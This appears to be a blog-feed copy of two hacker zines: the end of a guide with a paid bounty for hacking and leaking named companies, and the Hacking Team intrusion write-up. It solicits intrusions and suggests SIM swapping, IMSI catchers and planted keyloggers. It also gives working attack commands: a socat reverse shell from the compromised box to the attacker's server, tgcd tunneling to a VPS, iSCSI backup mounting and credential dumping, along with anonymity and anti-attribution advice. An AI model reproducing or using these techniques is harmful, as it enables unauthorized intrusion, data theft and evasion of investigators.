the rich, if they stop and think about those in poverty at all, give advice and
"solutions" so out of touch with reality that it's laughable. It explains why we
hail businessmen as brave risk takers. What are they risking, besides their
privilege? If all their ventures fail, they'll just have to live and work like
the rest of us. It also explains why many will call this unredacted leak
irresponsible and dangerous. They feel more strongly the "danger" to an offshore
bank and it's clients, than they feel the misery of those dispossessed by this
unequal and unjust system. Is leaking their finances truly even a danger to
them, or just to their position at the top of a hierarchy that shouldn't exist?



--[ 11 - Learn to hack ]--------------------------------------------------------

You don't start out hacking good stuff. You start out hacking crap and
thinking it's good stuff, and then gradually you get better at it.
That's why I say one of the most valuable traits is persistence.

- Octavia Butler's advice for the aspiring APT

The best way to learn hacking is through practice. Set up a lab environment with
virtual machines and start trying things out, taking breaks to research anything
you don't understand. At a minimum you'll want a windows server as a domain
controller, another normal domain joined windows vm, and a dev machine with
visual studio for compiling and modifying tools. Try out meterpreter, mimikatz,
bloodhound, kerberoasting, smb relaying, making an office document with macros
that spawn meterpreter or another RAT, psexec and other lateral movement
techniques [1], and the other scripts, tools and techniques mentioned in this
guide and in [2]. At first you can disable windows defender, but then try
everything with it enabled [3][4] (but with automatic sample submission off).
Once you're comfortable with all that, you're ready to hack 99% of companies.
Some things that will help you a lot to learn at some point are being
comfortable with bash and cmd.exe, basic proficiency in powershell, python, and
javascript, knowledge of kerberos [5][6] and active directory [7][8][9][10], and
fluency in english. A good introductory book is The Hacker Playbook.

I'll also write a little about what not to focus on so you don't get sidetracked
because someone told you you're not a "real" hacker if you don't know assembly
language. Obviously, learn about whatever interests you, but I'm writing this
from the perspective of what to focus on that'll give you the most practical
results when hacking companies to leak and expropriate. Basic knowledge of web
application security [11] is useful, but specialising more in web security is
not really the best use of time unless you want to make a career in pentesting
or bug bounty hunting. CTFs, and most of the resources you'll find when
searching for information about hacking, generally focus on skills like web
security, reverse engineering, exploit development etc. This makes sense if it's
understood as a way to prepare people for careers in industry, but not for our
goals. Intel agencies can afford to have a team dedicated to state of the art
fuzzing, a team working on exploit development with one guy just researching new
heap manipulation techniques, etc. We don't have the time or resources for that.
The two most important skills by far for practical hacking, are phishing [12]
and social engineering for initial access, and then being able to escalate and
move around in windows domains.

[1] https://hausec.com/2019/08/12/offensive-lateral-movement/
[2] https://www.exploit-db.com/papers/41915
[3] https://blog.sevagas.com/IMG/pdf/BypassAVDynamics.pdf
[4] https://www.trustedsec.com/blog/
discovering-the-anti-virus-signature-and-bypassing-it/
[5] https://www.tarlogic.com/en/blog/how-kerberos-works/
[6] https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
[7] https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/
[8] https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/
[9] https://adsecurity.org/
[10] https://github.com/infosecn1nja/AD-Attack-Defense
[11] https://github.com/jhaddix/tbhm
[12] https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-
external-engagement-through-spear-phishing/


--[ 12 - Recommended Reading ]--------------------------------------------------

________________________________________
/ When the scientific level of a world \
| exceeds its level of solidarity by too |
\ much, that world will destroy itself. /
----------------------------------------

Today hacking is done almost entirely by blackhats for personal profit,
whitehats for shareholder profit (and in defense of the banks, companies, and
states that are destroying us and our planet), and by militaries and
intelligence agencies as part of war and conflict. Seeing as our world is
already on the brink, I thought that in addition to technical advice on learning
to hack, I should include some resources that helped my development and have
guided how I use my hacking knowledge.

* Ami: Child of the Stars - Enrique Barrios

* Anarchy Works
https://theanarchistlibrary.org/library/peter-gelderloos-anarchy-works

* Living My Life - Emma Goldman

* The Rise and Fall of Jeremy Hammond: Enemy of the State
https://www.rollingstone.com/culture/culture-news/the-rise-and-fall-of-jeremy-
hammond-enemy-of-the-state-183599/

This guy and the HBGary hack were an inspiration

* Days of War, Nights of Love - Crimethinc

* Momo - Michael Ende

* Letters to a Young Poet - Rilke

* Dominion (Documentary)
"we cannot believe, that if we don't look at what we don't want to see, that it
doesn't exist" - Tolstoy in ĐŸĐ”Ń€ĐČая ŃŃ‚ŃƒĐżĐ”ĐœŃŒ

* Bash Back!


--[ 13 - Healing ]--------------------------------------------------------------

Hackers have high rates of depression, suicide, and mental health struggles. I
don't think that this is caused by hacking, but by the kind of environment many
hackers come from. Like many hackers, I grew up with little human contact, a kid
raised by the internet. I struggle with depression and emotional numbness.
Willie Sutton is often quoted as saying he robbed banks because "that's where
the money is", but that's incorrect. What he actually said was:

Why did I rob banks? Because I enjoyed it. I loved it. I was more
alive when I was inside a bank, robbing it, than at any other time in
my life. I enjoyed everything about it so much that one or two weeks
later I'd be out looking for the next job. But to me the money was the
chips, that's all.

Hacking made me feel alive - it started as a way to self-medicate depression.
Later I realized I could actually do something positive with it. I don't at all
regret how I grew up, it's led to many beautiful experiences in my life. But I
knew I couldn't continue living that way. So I started spending more time off my
computer, with others, learning to open myself up, to feel my emotions, to
connect with others, to take risks and to be vulnerable. It's far harder than
hacking, but in the end it's more rewarding. It's still a struggle, but even if
I'm slow and stumbling, I feel like I'm on a good path.

Hacking, done conscientiously, can also be what heals us. According to Mayan
teachings, we have a gift given to us by nature, that we need to understand so
that we can use it to serve our community. In [1], it explains:

When a person doesn't accept their job or mission, they begin to suffer
illnesses, apparently incurable; although in the short-term it doesn't
cause death, just suffering, with the objective of waking or becoming
aware. That's why it's indispensable that a person who has acquired
knowledge and does their work in the communities pay their Toj and maintains
constant communication with the Creator and their ruwĂ€ch q’ij, as they
constantly need the force and energy of them. If not, the illnesses that
caused them to take on their work can return to cause damage.

If you feel that hacking is increasing your isolation, depression, or other
suffering, take a break. Give yourself time to know yourself and become
aware. You deserve to live happy, healthy, and fully.


[1] Ruxe’el mayab’ K’aslemĂ€l: RaĂ­z y espĂ­ritu del conocimiento maya
https://www.url.edu.gt/publicacionesurl/FileCS.ashx?Id=41748


--[ 14 - Hacktivist Bug Bounty Program ]----------------------------------------

I think that hacking to acquire and leak documents in the public interest is one
of the most socially beneficial ways that hackers can use their skills.
Unfortunately for hackers, as for most fields, the perverse incentives of our
economic system don't align with what benefits society. So this program is my
attempt to make it possible for good hackers to earn an honest living uncovering
material in the public interest, rather than having to sell their labour to the
cybersecurity, cybercrime, or cyberwar industries. Examples of companies I'd
love to pay for leaks from include the mining, lumber, and cattle companies
ravaging our beautiful latin america (and assassinating the environmentalists
trying to stop them), companies involved in attacking Rojava such as Havelsan,
Baykar Makina, or Aselsan, surveillance companies like NSO group, war criminals
and profiteers like Blackwater and Halliburton, private prison companies like
GeoGroup and CoreCivic/CCA, and corporate lobbyists like ALEC. Be mindful when
selecting where to investigate. For example, we all know that oil companies are
evil -- they're destroying the planet to get rich. They've known that themselves
since the 80s [1]. However, if you hack them directly, you'll have to dig
through enormous amounts of incredibly boring information about their day to day
operations. It'll probably be a lot easier to find something interesting by
targeting their lobbyists [2]. Another way to select viable targets is to read
stories by investigative journalists like [3], that are interesting but lack
hard evidence. That's what your hacking can uncover.

I'll pay up to $100K each for those sorts of leaks, depending on the public
interest and impact of the material, and the work involved in the hack.
Obviously, leaking all the documents and internal communication from some of
those businesses would have a benefit to society far exceeding 100k, but I'm not
trying to make anyone rich, I'm just trying to provide enough funding so that
hackers can earn a dignified living doing good work. Due to time constraints and
security concerns, I will not open and look through material myself. Rather,
once the material is published, I'll read what journalists write about it and
judge the public interest of the material from that. My contact information is
at the end of [4].

How you obtain the material is up to you. You can use traditional hacking
techniques outlined in this guide and in [4]. You can sim swap [5] a corrupt
politician or businessman and then download their emails and cloud backups. You
can order an IMSI catcher from alibaba and use it outside their offices. You can
go wardriving -- of the old or new kind [6]. You can be an insider who already
has access. You can go old-school low-tech like [7] and [8] and just sneak into
their offices. Whatever works for you.

[1] https://www.theguardian.com/environment/climate-consensus-97-per-cent/2018/
sep/19/shell-and-exxons-secret-1980s-climate-change-warnings
[2] https://theintercept.com/2019/08/19/oil-lobby-pipeline-protests/
[3] https://www.bloomberg.com/features/2016-how-to-hack-an-election/
[4] https://www.exploit-db.com/papers/41915
[5] https://www.vice.com/en_us/article/vbqax3/hackers-sim-swapping-steal-phone-
numbers-instagram-bitcoin
[6] https://blog.rapid7.com/2019/09/05/this-one-time-on-a-pen-test-your-mouse-
is-my-keyboard/
[7] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
[8] https://en.wikipedia.org/wiki/Unnecessary_Fuss


----[ 14.1 - Partial payouts ]--------------------------------------------------

Are you a good maid working in an evil corp [1], and willing to slip a hardware
keylogger onto an executive's computer, swap out their charging cable for a
modified [2] one, hide a mic in a room where they discuss their evil plans, or
leave one of these [3] somewhere around the office?

[1] https://en.wikipedia.org/wiki/Evil_maid_attack
[2] http://mg.lol/blog/defcon-2019/
[3] https://shop.hak5.org/products/lan-turtle

Are you good with phishing and social engineering and got a shell on an
employee's computer, or phished their vpn credentials? But unable to get domain
admin and download the goods?

Have you been doing bug bounty programs and become an expert in web app hacking,
but don't have enough all around hacking experience to fully compromise the
company?

Do you have a knack for reverse engineering? Scan some evil corps to see what
devices they have exposed to the internet (firewall, vpn, and mail scanning
appliances will be much more useful than stuff like IP cameras), reverse
engineer it and find a remotely exploitable vulnerability.

If I'm able to work with you to compromise the company and get material in the
public interest, you'll be compensated for your work. If I don't have time to
work on it myself, I'll at least try and advise you on how to continue to
complete the hack yourself.

Right now helping those in power hack and surveil dissidents, activists, and the
general population is a multibillion dollar industry, while hacking and exposing
those in power is risky and unpaid volunteer work. Turning it into a
multimillion dollar industry won't quite fix that power imbalance and solve
society's problems. But I think it'll be fun. So I can't wait for people to
start claiming bounties!


--[ 15 - Abolish Prisons ]------------------------------------------------------

Construidas por el enemigo pa encerrar ideas
encerrando compañeros pa acallar gritos de guerra
es el centro de tortura y aniquilamiento
donde el ser humano se vuelve mĂĄs violento
es el reflejo de la sociedad, represiva y carcelaria
sostenida y basada en lĂłgicas autoritarias
custodiadas reprimidos y vigilados
miles de presas y presos son exterminados
ante esta måquina esquizofrénica y despiadada
compañero Axel Osorio dando la pela en la cana
rompiendo el aislamiento y el silenciamiento
fuego y guerra a la carcel vamos destruyendo!

Rap Insurrecto - Palabras En Conflicto

It'd be typical to end a hacker zine saying free hammond, free manning, free
hamza, free those arrested in the fabricated Network case, etc. I'll take that
tradition to it's radical conclusion [1] and say abolish prisons already! Being
a criminal myself, you might feel that I'm a little biased on the issue. But
seriously, it's not even controversial, even the UN mostly agrees [2]. So free
all the migrants [3][4][5][6], often imprisoned by the same countries who
created the war, environmental, and economic destruction that they're fleeing
from. Free everyone imprisoned by the war on drug users [7]. Free everyone
imprisoned by the war on the poor [8]. Prisons are about hiding and ignoring the
evidence of social problems rather than genuinely fixing them. And until
everyone is free, fight the prison system by not ignoring and forgetting those
stuck inside. Send them love, letters, helicopters [9], pirate radio [10], and
books, and support those organizing from the inside [11][12].

[1] https://collectiveliberation.org/wp-content/uploads/2013/01/Are_Prisons_
Obsolete_Angela_Davis.pdf
[2] http://www.unodc.org/pdf/criminal_justice/Handbook_of_Basic_Principles_and_
Promising_Practices_on_Alternatives_to_Imprisonment.pdf
[3] https://www.theguardian.com/us-news/2016/dec/21/us-immigration-detention-
center-christmas-santa-wish-list
[4] https://www.theguardian.com/us-news/2016/aug/18/us-border-patrol-facility-
images-tucson-arizona
[5] https://www.playgroundmag.net/now/detras-Centros-Internamiento-Extranjeros-
Espana_22648665.html
[6] https://www.nytimes.com/2019/06/26/world/australia/
australia-manus-suicide.html
[7] https://en.wikiquote.org/wiki/John_Ehrlichman#Quotes
[8] VI, 2. i. La multa impaga: https://scielo.conicyt.cl/scielo.php?script=
sci_arttext&pid=S0718-00122012000100005
[9] p. 10, Libelo NÂș2. BoletĂ­n polĂ­tico desde la CĂĄrcel de Alta Seguridad
[10] https://itsgoingdown.org/transmissions-hostile-territory/
[11] https://freealabamamovement.wordpress.com/f-a-m-pamphlet-who-we-are/
[12] https://incarceratedworkers.org/


--[ 16 - Conclusion ]-----------------------------------------------------------

Our world is upside down [1]. The justice system represents injustice. Law and
order is about creating an illusion of social peace to hide deep and systematic
exploitation, violence, and injustice. Follow your conscience, not the law.

[1] Upside Down: A Primer for the Looking-Glass World - Galeano

Businessmen get rich harming people and the planet, while care work is largely
unpaid. Through the assault on anything communal, we've somehow managed to build
densely populated cities full of loneliness and isolation. Our political and
economic system encourages all the worst possibilities of human nature: greed,
selfishness, ego, competition, lack of compassion, and love for authority. So
for everyone who's stayed sensitive and compassionate in a cold world, for all
the everyday heroes practicing everyday kindness, for all of you who have a
burning star in your hearts: ĐłĐŸpĐž, ĐłĐŸpĐž ŃŃĐœĐŸ, Ń‡Ń‚ĐŸĐ±Ń‹ ĐœĐ” ĐżĐŸĐłĐ°ŃĐ»ĐŸ!




[*] the following poem is adopted from the Zapatistas' Fourth Declaration
https://en.wikisource.org/wiki/Fourth_Declaration_of_the_Lacandon_Jungle

Nosotras nacimos de la noche.
en ella vivimos, hackeamos en ella.

AquĂ­ estamos, somos la dignidad rebelde,
el corazĂłn olvidado de la Đ˜ĐœŃ‚Đ”Ń€ĐœĐ”Ń‚.

Nuestra lucha es por la memoria y la justicia,
y el mal gobierno se llena de criminales y asesinos.

Nuestra lucha es por un trabajo justo y digno,
y el mal gobierno y las corporaciones compran y venden zero days.

Para todas el mañana.
Para nosotras la alegre rebeldĂ­a de las filtraciones
y la expropiaciĂłn.

Para todas todo.
Para nosotras nada.


Desde las montañas del Sureste Cibernético,
]]>
HackBack-HackingTeam https://hack4living.com/2012/04/27/hackback-hackingteam/ Fri, 27 Apr 2012 23:11:20 +0000 https://hack4living.com/?p=275

–[ 1 – Introduction ]———————————————————-

You’ll notice the change in language since the last edition [1]. The
English-speaking world already has tons of books, talks, guides, and
info about hacking. In that world, there’s plenty of hackers better than me,
but they misuse their talents working for “defense” contractors, for intelligence
agencies, to protect banks and corporations, and to defend the status quo.
Hacker culture was born in the US as a counterculture, but that origin only
remains in its aesthetics – the rest has been assimilated. At least they can
wear a t-shirt, dye their hair blue, use their hacker names, and feel like
rebels while they work for the Man.

You used to have to sneak into offices to leak documents [2]. You used to need
a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4].
Like the CNT said after the Gamma Group hack: “Let’s take a step forward with
new forms of struggle” [5]. Hacking is a powerful tool, let’s learn and fight!

[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
[3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html
[4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
[5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group


–[ 2 – Hacking Team ]—————————————————–

Hacking Team was a company that helped governments hack and spy on
journalists, activists, political opposition, and other threats to their power
[1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals
and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the
fascist slogan “boia chi molla”. It’d be more correct to say “boia chi vende
RCS”. They also claimed to have technology to solve the “problem” posed by Tor
and the darknet [13]. But seeing as I’m still free, I have my doubts about
its effectiveness.

[1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
[2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
[3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
[4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
[5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
[6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
[7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
[8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
[9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
[10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/
[11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/
[12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html
[13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web


–[ 3 – Stay safe out there ]—————————————————

Unfortunately, our world is backwards. You get rich by doing bad things and go
to jail for doing good. Fortunately, thanks to the hard work of people like
the Tor project [1], you can avoid going to jail by taking a few simple
precautions:

1) Encrypt your hard disk [2]

I guess when the police arrive to seize your computer, it means you’ve
already made a lot of mistakes, but it’s better to be safe.

2) Use a virtual machine with all traffic routed through Tor

This accomplishes two things. First, all your traffic is anonymized through
Tor. Second, keeping your personal life and your hacking on separate
computers helps you not to mix them by accident.

You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or
something custom [6]. Here’s [7] a detailed comparison.

3) (Optional) Don’t connect directly to Tor

Tor isn’t a panacea. They can correlate the times you’re connected to Tor
with the times your hacker handle is active. Also, there have been
successful attacks against Tor [8]. You can connect to Tor using other
peoples’ wifi. Wifislax [9] is a linux distro with a lot of tools for
cracking wifi. Another option is to connect to a VPN or a bridge node [10]
before Tor, but that’s less secure because they can still correlate the
hacker’s activity with your house’s internet activity (this was used as
evidence against Jeremy Hammond [11]).

The reality is that while Tor isn’t perfect, it works quite well. When I
was young and reckless, I did plenty of stuff without any protection (I’m
referring to hacking) apart from Tor, that the police tried their hardest
to investigate, and I’ve never had any problems.

[1] https://www.torproject.org/
[2] https://info.securityinabox.org/es/chapter-4
[3] https://www.whonix.org/
[4] https://tails.boum.org/
[5] https://www.qubes-os.org/doc/privacy/torvm/
[6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy
[7] https://www.whonix.org/wiki/Comparison_with_Others
[8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
[9] http://www.wifislax.com/
[10] https://www.torproject.org/docs/bridges.html.en
[11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html


—-[ 3.1 – Infrastructure ]—————————————————-

I don’t hack directly from Tor exit nodes. They’re on blacklists, they’re
slow, and they can’t receive connect-backs. Tor protects my anonymity while I
connect to the infrastructure I use to hack, which consists of:

1) Domain Names

For C&C addresses, and for DNS tunnels for guaranteed egress.

2) Stable Servers

For use as C&C servers, to receive connect-back shells, to launch attacks,
and to store the loot.

3) Hacked Servers

For use as pivots to hide the IP addresses of the stable servers. And for
when I want a fast connection without pivoting, for example to scan ports,
scan the whole internet, download a database with sqli, etc.

Obviously, you have to use an anonymous payment method, like bitcoin (if it’s
used carefully).


—-[ 3.2 – Attribution ]——————————————————-

In the news we often see attacks traced back to government-backed hacking
groups (“APTs”), because they repeatedly use the same tools, leave the same
footprints, and even use the same infrastructure (domains, emails, etc).
They’re negligent because they can hack without legal consequences.

I didn’t want to make the police’s work any easier by relating my hack of
Hacking Team with other hacks I’ve done or with names I use in my day-to-day
work as a blackhat hacker. So, I used new servers and domain names, registered
with new emails, and payed for with new bitcoin addresses. Also, I only used
tools that are publicly available, or things that I wrote specifically for
this attack, and I changed my way of doing some things to not leave my usual
forensic footprint.


–[ 4 – Information Gathering ]————————————————-

Although it can be tedious, this stage is very important, since the larger the
attack surface, the easier it is to find a hole somewhere in it.


—-[ 4.1 – Technical Information ]———————————————

Some tools and techniques are:

1) Google

A lot of interesting things can be found with a few well-chosen search
queries. For example, the identity of DPR [1]. The bible of Google hacking
is the book “Google Hacking for Penetration Testers”. You can find a short
summary in Spanish at [2].

2) Subdomain Enumeration

Often, a company’s main website is hosted by a third party, and you’ll find
the company’s actual IP range thanks to subdomains like mx.company.com or
ns1.company.com. Also, sometimes there are things that shouldn’t be exposed
in “hidden” subdomains. Useful tools for discovering domains and subdomains
are fierce [3], theHarvester [4], and recon-ng [5].

3) Whois lookups and reverse lookups

With a reverse lookup using the whois information from a domain or IP range
of a company, you can find other domains and IP ranges. As far as I know,
there’s no free way to do reverse lookups aside from a google “hack”:

“via della moscova 13” site:www.findip-address.com
“via della moscova 13” site:domaintools.com

4) Port scanning and fingerprinting

Unlike the other techniques, this talks to the company’s servers. I
include it in this section because it’s not an attack, it’s just
information gathering. The company’s IDS might generate an alert, but you
don’t have to worry since the whole internet is being scanned constantly.

For scanning, nmap [6] is precise, and can fingerprint the majority of
services discovered. For companies with very large IP ranges, zmap [7] or
masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web
sites.

[1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html
[2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
[3] http://ha.ckers.org/fierce/
[4] https://github.com/laramies/theHarvester
[5] https://bitbucket.org/LaNMaSteR53/recon-ng
[6] https://nmap.org/
[7] https://zmap.io/
[8] https://github.com/robertdavidgraham/masscan
[9] http://www.morningstarsecurity.com/research/whatweb
[10] http://blindelephant.sourceforge.net/


—-[ 4.2 – Social Information ]————————————————

For social engineering, it’s useful to have information about the employees,
their roles, contact information, operating system, browser, plugins,
software, etc. Some resources are:

1) Google

Here as well, it’s the most useful tool.

2) theHarvester and recon-ng

I already mentioned them in the previous section, but they have a lot more
functionality. They can find a lot of information quickly and
automatically. It’s worth reading all their documentation.

3) LinkedIn

A lot of information about the employees can be found here. The company’s
recruiters are the most likely to accept your connection requests.

4) Data.com

Previously known as jigsaw. They have contact information for many
employees.

5) File Metadata

A lot of information about employees and their systems can be found in
metadata of files the company has published. Useful tools for finding
files on the company’s website and extracting the metadata are metagoofil
[1] and FOCA [2].

[1] https://github.com/laramies/metagoofil
[2] https://www.elevenpaths.com/es/labstools/foca-2/index.html


–[ 5 – Entering the network ]————————————————–

There are various ways to get a foothold. Since the method I used against
Hacking Team is uncommon and a lot more work than is usually necessary, I’ll
talk a little about the two most common ways, which I recommend trying first.


—-[ 5.1 – Social Engineering ]————————————————

Social engineering, specifically spear phishing, is responsible for the
majority of hacks these days. For an introduction in Spanish, see [1]. For
more information in English, see [2] (the third part, “Targeted Attacks”). For
fun stories about the social engineering exploits of past generations, see
[3]. I didn’t want to try to spear phish Hacking Team, as their whole business
is helping governments spear phish their opponents, so they’d be much more
likely to recognize and investigate a spear phishing attempt.

[1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
[2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
[3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf


—-[ 5.2 – Buying Access ]—————————————————–

Thanks to hardworking Russians and their exploit kits, traffic sellers, and
bot herders, many companies already have compromised computers in their
networks. Almost all of the Fortune 500, with their huge networks, have some
bots already inside. However, Hacking Team is a very small company, and most
of it’s employees are infosec experts, so there was a low chance that they’d
already been compromised.


—-[ 5.3 – Technical Exploitation ]——————————————–

After the Gamma Group hack, I described a process for searching for
vulnerabilities [1]. Hacking Team had one public IP range:
inetnum: 93.62.139.32 – 93.62.139.47
descr: HT public subnet

Hacking Team had very little exposed to the internet. For example, unlike
Gamma Group, their customer support site needed a client certificate to
connect. What they had was their main website (a Joomla blog in which Joomscan
[2] didn’t find anything serious), a mail server, a couple routers, two VPN
appliances, and a spam filtering appliance. So, I had three options: look for
a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the
embedded devices. A 0day in an embedded device seemed like the easiest option,
and after two weeks of work reverse engineering, I got a remote root exploit.
Since the vulnerabilities still haven’t been patched, I won’t give more
details, but for more information on finding these kinds of vulnerabilities,
see [3] and [4].

[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] http://sourceforge.net/projects/joomscan/
[3] http://www.devttys0.com/
[4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A


–[ 6 – Be Prepared ]———————————————————–

I did a lot of work and testing before using the exploit against Hacking Team.
I wrote a backdoored firmware, and compiled various post-exploitation tools
for the embedded device. The backdoor serves to protect the exploit. Using the
exploit just once and then returning through the backdoor makes it harder to
identify and patch the vulnerabilities.

The post-exploitation tools that I’d prepared were:

1) busybox

For all the standard Unix utilities that the system didn’t have.

2) nmap

To scan and fingerprint Hacking Team’s internal network.

3) Responder.py

The most useful tool for attacking windows networks when you have access to
the internal network, but no domain user.

4) Python

To execute Responder.py

5) tcpdump

For sniffing traffic.

6) dsniff

For sniffing passwords from plaintext protocols like ftp, and for
arpspoofing. I wanted to use ettercap, written by Hacking Team’s own ALoR
and NaGA, but it was hard to compile it for the system.

7) socat

For a comfortable shell with a pty:
my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port
hacked box: socat exec:’bash -li’,pty,stderr,setsid,sigint,sane \
tcp:my_server:my_port

And useful for a lot more, it’s a networking swiss army knife. See the
examples section of its documentation.

8) screen

Like the shell with pty, it wasn’t really necessary, but I wanted to feel
at home in Hacking Team’s network.

9) a SOCKS proxy server

To use with proxychains to be able to access their local network from any
program.

10) tgcd

For forwarding ports, like for the SOCKS server, through the firewall.

[1] https://www.busybox.net/
[2] https://nmap.org/
[3] https://github.com/SpiderLabs/Responder
[4] https://github.com/bendmorris/static-python
[5] http://www.tcpdump.org/
[6] http://www.monkey.org/~dugsong/dsniff/
[7] http://www.dest-unreach.org/socat/
[8] https://www.gnu.org/software/screen/
[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
[10] http://tgcd.sourceforge.net/


The worst thing that could happen would be for my backdoor or post-exploitation
tools to make the system unstable and cause an employee to investigate. So I
spent a week testing my exploit, backdoor, and post-exploitation tools in the
networks of other vulnerable companies before entering Hacking Team’s network.


–[ 7 – Watch and Listen ]——————————————————

Now inside their internal network, I wanted to take a look around and think
about my next step. I started Responder.py in analysis mode (-A to listen
without sending poisoned responses), and did a slow scan with nmap.


–[ 8 – NoSQL Databases ]——————————————————-

NoSQL, or rather NoAuthentication, has been a huge gift to the hacker
community [1]. Just when I was worried that they’d finally patched all of the
authentication bypass bugs in MySQL [2][3][4][5], new databases came into
style that lack authentication by design. Nmap found a few in Hacking Team’s
internal network:

27017/tcp open mongodb MongoDB 2.6.5
| mongodb-databases:
| ok = 1
| totalSizeMb = 47547
| totalSize = 49856643072

|_ version = 2.6.5

27017/tcp open mongodb MongoDB 2.6.5
| mongodb-databases:
| ok = 1
| totalSizeMb = 31987
| totalSize = 33540800512
| databases

|_ version = 2.6.5

They were the databases for test instances of RCS. The audio that RCS records
is stored in MongoDB with GridFS. The audio folder in the torrent [6] came
from this. They were spying on themselves without meaning to.

[1] https://www.shodan.io/search?query=product%3Amongodb
[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
[5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
[6] https://ht.transparencytoolkit.org/audio/


–[ 9 – Crossed Cables ]——————————————————–

Although it was fun to listen to recordings and see webcam images of Hacking
Team developing their malware, it wasn’t very useful. Their insecure backups
were the vulnerability that opened their doors. According to their
documentation [1], their iSCSI devices were supposed to be on a separate
network, but nmap found a few in their subnetwork 192.168.1.200/24:

Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)

3260/tcp open iscsi?
| iscsi-info:
| Target: iqn.2000-01.com.synology:ht-synology.name
| Address: 192.168.200.66:3260,0
|_ Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)

3260/tcp open iscsi?
| iscsi-info:
| Target: iqn.2000-01.com.synology:synology-backup.name
| Address: 10.0.1.72:3260,0
| Address: 192.168.200.72:3260,0
|_ Authentication: No authentication required

iSCSI needs a kernel module, and it would’ve been difficult to compile it for
the embedded system. I forwarded the port so that I could mount it from a VPS:

VPS: tgcd -L -p 3260 -q 42838
Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838

VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1

Now iSCSI finds the name iqn.2000-01.com.synology but has problems mounting it
because it thinks its IP is 192.168.200.72 instead of 127.0.0.1

The way I solved it was:
iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT –to-destination 127.0.0.1

And now, after:
iscsiadm -m node –targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 –login

…the device file appears! We mount it:
vmfs-fuse -o ro /dev/sdb1 /mnt/tmp

and find backups of various virtual machines. The Exchange server seemed like
the most interesting. It was too big too download, but it was possible to
mount it remotely to look for interesting files:
$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
$ fdisk -l /dev/loop0
/dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT

so the offset is 2048 * 512 = 1048576
$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/

now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311
we find the hard disk of the VM, and mount it:
vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1

…and finally we’ve unpacked the Russian doll and can see all the files from
the old Exchange server in /mnt/part1

[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf


–[ 10 – From backups to domain admin ]—————————————–

What interested me most in the backup was seeing if it had a password or hash
that could be used to access the live server. I used pwdump, cachedump, and
lsadump [1] on the registry hives. lsadump found the password to the besadmin
service account:

_SC_BlackBerry MDS Connection Service
